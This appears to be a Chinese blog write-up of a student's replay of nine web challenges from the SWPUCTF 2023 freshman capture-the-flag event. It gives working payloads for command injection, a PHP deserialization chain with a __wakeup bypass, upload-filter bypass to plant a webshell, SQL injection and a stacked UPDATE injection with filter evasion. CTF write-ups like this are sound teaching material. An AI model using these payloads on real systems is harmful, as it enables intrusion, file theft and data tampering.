【Web】SWPUCTF 2023 秋季新生赛 个人复现

目录

①一键连接!

②Pingpingping

③UnS3rialize

④ez_talk

⑤NSS_HTTP_CHEKER 

⑥RCE-PLUS 

⑦查查need 

⑧If_else 

⑨NSS大卖场

---

复现套题试试

①一键连接!

 payload:

?md5_1[]=1&md5_2[]=2&sha1_1[]=1&sha1_2[]=2&new_player=data://text/plain,Welcome to NSSCTF!!!

 懒得连蚁剑，直接来吧

Nss=system('ls /');

Nss=system('tac /fl*');

②Pingpingping

payload:

?Ping[ip.exe=127.0.0.1;ls / 

?Ping[ip.exe=127.0.0.1;tac /f*

(如果直接写Ping_ip.exe会被解析成Ping_ip_exe，不解释)

③UnS3rialize

贴出源码，take it easy

 ";
        system($this->cmd);
    }
    function __wakeup()
    {
        echo "W4keup!!!
";
        $this->cmd = "echo Welcome to NSSCTF";
    }
}


class C
{
    public $whoami;
    function __get($argv)
    {
        echo "what do you want?";
        $want = $this->whoami;
        return $want();
    }
}

class T
{
    public $sth;
    function __toString()
    {
        echo "Now you know how to use __toString
There is more than one way to trigger";
        return $this->sth->var;
    }
}

class F
{
    public $user = "nss";
    public $passwd = "ctf";
    public $notes;
    function __construct($user, $passwd)
    {
        $this->user = $user;
        $this->passwd = $passwd;
    }
    function __destruct()
    {
        if ($this->user === "SWPU" && $this->passwd === "NSS") {
                echo "Now you know how to use __construct
";
                echo "your notes".$this->notes;
        }else{
            die("N0!");
        }
    }
}



if (isset($_GET['ser'])) {
    $ser = unserialize(base64_decode($_GET['ser']));
} else {
    echo "Let's do some deserialization :)";
}
Let's do some deserialization :)

简单搓个链子：

F::__destruct() --> T::__toString() --> C::__get() --> NSS::__invoke()

构造

$a=new F();
$b=new T();
$c=new C();
$d=new NSS();
$a->user='SWPU';
$a->passwd='NSS';
$a->notes=$b;
$b->sth=$c;
$c->whoami=$d;

echo serialize($a);

//O:1:"F":3:{s:4:"user";s:4:"SWPU";s:6:"passwd";s:3:"NSS";s:5:"notes";O:1:"T":1:{s:3:"sth";O:1:"C":1:{s:6:"whoami";O:3:"NSS":1:{s:3:"cmd";s:9:"cat /flag";}}}}

 小trick绕过__wakeup再base64编码

 payload:

?ser=TzoxOiJGIjo0OntzOjQ6InVzZXIiO3M6NDoiU1dQVSI7czo2OiJwYXNzd2QiO3M6MzoiTlNTIjtzOjU6Im5vdGVzIjtPOjE6IlQiOjE6e3M6Mzoic3RoIjtPOjE6IkMiOjE6e3M6Njoid2hvYW1pIjtPOjM6Ik5TUyI6MTp7czozOiJjbWQiO3M6OToiY2F0IC9mbGFnIjt9fX19

④ez_talk

（经典弔图前端）

 MIME绕过+文件头GIF89a绕过

访问/uploads/yjh3.php

直接蚁剑连

⑤NSS_HTTP_CHEKER 

经典新生赛必考题哈哈

 bp抓包改包

下略

⑥RCE-PLUS 

无回显rce，没过滤curl

直接反弹shell秒了

 

⑦查查need 

进来是一个查询表单，应该是sql注入了

查看源码发现hint

 下载附件

随便选个姓名

上万能密码（经测试闭合方式为双引号），成功查询

猜测flag在成绩字段中

 把附件的姓名都导出为txt，bp爆破

 就出了

⑧If_else 

这题出得很有意思

 check=1==1){ system('cat /f*');} /*

访问check.php

 

真乃神技也 

⑨NSS大卖场

经典买flag

不过之前都是改前端的（）

没啥头绪，看眼hint

下载数据库备份附件

意思是和数据库有关

 抓包看一下买的过程，发现/buy/n的n就是买的东西的id

 大胆尝试Update注入

1';update items set price=1 where id=8;#

回显

空格用%09，update，where大小写绕过

1';upDate%09items%09set%09price=1%09Where%09id=8;#

成功修改flag价格，直接购买即可